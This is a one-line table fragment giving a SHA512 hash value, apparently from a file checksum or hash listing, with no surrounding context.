| SHA512 | 3812c8683c8455160a6d3cd1532c708c8036eceb818c3f6bd91925dc4e54f89bd4e0c3aa238f2351560408a4e9c1d5fb9ca2e96c0c725cc20814c23450535a8a |